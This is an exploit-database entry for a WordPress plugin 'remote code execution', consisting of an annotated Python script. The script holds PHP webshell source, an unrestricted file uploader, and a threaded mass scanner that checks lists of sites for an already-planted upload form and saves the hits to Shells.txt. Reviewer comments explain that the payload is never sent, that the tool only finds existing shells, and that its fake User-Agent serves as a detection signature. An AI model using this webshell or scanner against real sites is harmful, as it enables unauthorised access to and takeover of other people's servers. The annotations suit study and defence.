WordPress Plugin Background Image Cropper v1.2 – Remote Code Execution

  • 作者: Milad karimi
    日期: 2024-04-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51998/
  • # Exploit Title: WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution
    # Date: 2024-04-16
    # Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # Vendor Homepage: https://wordpress.org
    # Software Link: https://wordpress.org/plugins/background-image-cropper/
    # Version: 1.2
    # Category : webapps
    # Tested on: Windows 10, Firefox
    # NOTE (review): the script below only GETs a fixed ups.php path and looks for an upload-form fragment in the response; it never sends the `shell` payload it defines, so it is a finder for already-present webshells, not an exploit of the plugin itself.
    
    import sys , requests, re
    from multiprocessing.dummy import Pool
    from colorama import Fore
    from colorama import init
    init(autoreset=True)
    # PHP payload: prints a banner plus php_uname() and renders a file-upload
    # form; on POST it copy()s the uploaded temp file to the client-supplied
    # file name (a relative path, so it lands wherever the PHP process's
    # working directory is) -- i.e. an unrestricted uploader / webshell dropper.
    # NOTE (review): nothing else in this script references ``shell``; no
    # POST or upload is ever performed, so this payload is dead code here.
    shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
    "<form method='post' enctype='multipart/form-data'> <input type='file'
    name='zb'><input type='submit' name='upload' value='upload'></form>";
    if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
    $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
    Upload."; } } ?>"""
    # Silence urllib3's warnings -- in particular the InsecureRequestWarning
    # that the verify=False https probe further down would otherwise emit for
    # every host.  Security note: this hides the unverified-TLS issue rather
    # than fixing it; a hit reported over https could come from an on-path
    # party, not the target.
    requests.urllib3.disable_warnings()
    # Browser-like request headers sent with every probe.
    # NOTE (review): the User-Agent is a hand-typed fake with misspellings
    # ("Mozlila", "Bulid", "Moblie") and "referer" is lower-case with a
    # scheme-less value; both are convenient log signatures for defenders who
    # want to spot this scanner's traffic.
    headers = {'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
    Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
    Chrome/60.0.3112.107 Moblie Safari/537.36',
    'Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'referer': 'www.google.com'}
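    # Load the target list (one host per line) from the file named on the
    # command line.  A missing argument prints a usage line; an unreadable
    # file prints an error instead of a traceback.
    try:
        target_file = sys.argv[1]
    except IndexError:
        # Show just the script's file name in the usage line.  Split on both
        # separators so this is right on Windows and POSIX (the original split
        # on backslash only).
        script = sys.argv[0].replace('\\', '/').rsplit('/', 1)[-1]
        sys.exit('\n[!] Enter <' + script + '> <sites.txt>')
    try:
        # Context manager closes the handle; the original leaked it.
        with open(target_file, mode='r') as handle:
            # Drop blank/whitespace-only lines -- they would otherwise become
            # probes of "http:///wp-content/..." and be reported as failures.
            target = [line.strip() for line in handle if line.strip()]
    except IOError as err:
        sys.exit('\n[!] Cannot read ' + target_file + ': ' + str(err))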
    
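    def URLdomain(site):
        """Reduce a target line to its bare host (plus port, if any).

        Strips one leading ``http://`` or ``https://`` (case-insensitively)
        and drops everything from the first ``/`` onwards, so
        ``https://Example.com:8080/wp/`` becomes ``Example.com:8080``.  No
        validation is done: whatever is left is later concatenated straight
        into the probe URL.

        Args:
            site: One (already stripped) line from the target list.

        Returns:
            The host part, or ``''`` when nothing precedes the first slash.
        """
        # Remove only the *leading* scheme.  The original used str.replace(),
        # which deletes every occurrence of "http://" anywhere in the line,
        # and matched the scheme case-sensitively.
        lowered = site.lower()
        for prefix in ('http://', 'https://'):
            if lowered.startswith(prefix):
                site = site[len(prefix):]
                break
        # Everything after the first "/" is path and is discarded -- this is
        # what the original's repeated "(.*)/" regex stripping amounted to.
        return site.split('/', 1)[0]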
    
    
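    def FourHundredThree(url):
        """Probe one host for an already-present ``ups.php`` upload form.

        Despite the advisory title, this function does not exploit or upload
        anything.  It GETs
        ``/wp-content/plugins/background-image-cropper/ups.php`` over
        ``http://`` and then ``https://`` and reports a hit when the response
        body contains a fixed HTML fragment of an upload form.  A hit means an
        uploader/webshell is *already* on the target; the ``shell`` payload
        defined at module level is never sent.

        Args:
            url: One line from the target list; scheme and path are stripped
                by ``URLdomain`` before probing.

        Returns:
            None.  Prints one result line per target and appends every hit
            URL to ``Shells.txt``.  Network/TLS errors are reported as
            ``[Failed]`` and never raised, so the thread pool keeps running.
        """
        shell_path = '/wp-content/plugins/background-image-cropper/ups.php'
        # Fragment that counts as a hit.  It is a generic uploader signature
        # (name="uploader" / "_upl"), not the ``shell`` text above, so only
        # that exact form is detected.
        marker = ('enctype="multipart/form-data" name="uploader" '
                  'id="uploader"><input type="file" name="file" size="50">'
                  '<input name="_upl" type="submit" id="_upl" value="Upload')
        host = URLdomain(url)
        base = 'http://' + host
        try:
            # http first, then https; the first scheme whose response carries
            # the form wins.  verify=False on https means the target's
            # certificate is never checked, so an on-path party could also
            # feed a fake hit -- acceptable for a scanner, but know it.
            for scheme, verify in (('http://', True), ('https://', False)):
                base = scheme + host
                response = requests.get(base + shell_path, headers=headers,
                                        allow_redirects=True, verify=verify,
                                        timeout=15)
                # .text (decoded str) rather than .content (bytes on
                # Python 3) so the substring test works on both interpreters.
                if marker in response.text:
                    # The original referenced undefined names fg/fr here;
                    # colorama's Fore is what the file imports.
                    print(' -| ' + base + ' --> {}[Succefully]'.format(Fore.GREEN))
                    with open('Shells.txt', 'a') as out:
                        out.write(base + shell_path + '\n')
                    return
            print(' -| ' + base + ' --> {}[Failed]'.format(Fore.RED))
        except requests.exceptions.RequestException:
            # Connection refused, timeout, TLS failure, bad host name, ...:
            # treat as a miss instead of killing the worker thread.  Narrower
            # than the original bare except, which also swallowed NameError
            # and KeyboardInterrupt.
            print(' -| ' + base + ' --> {}[Failed]'.format(Fore.RED))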
    
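    # Fan the probes out over 150 worker threads (multiprocessing.dummy ==
    # threads, fine for this I/O-bound work).  Results are written by the
    # workers themselves; map() is only used for dispatch.
    mp = Pool(150)
    try:
        mp.map(FourHundredThree, target)
    finally:
        # Always release the pool, even if a worker raised out of map().
        mp.close()
        mp.join()

    # The workers append hits to Shells.txt; the original message pointed at a
    # non-existent "LOL.txt".  (fc was never defined; Fore.CYAN is the
    # colorama name the file actually imports.)
    print('\n [!] {}Saved in Shells.txt'.format(Fore.CYAN))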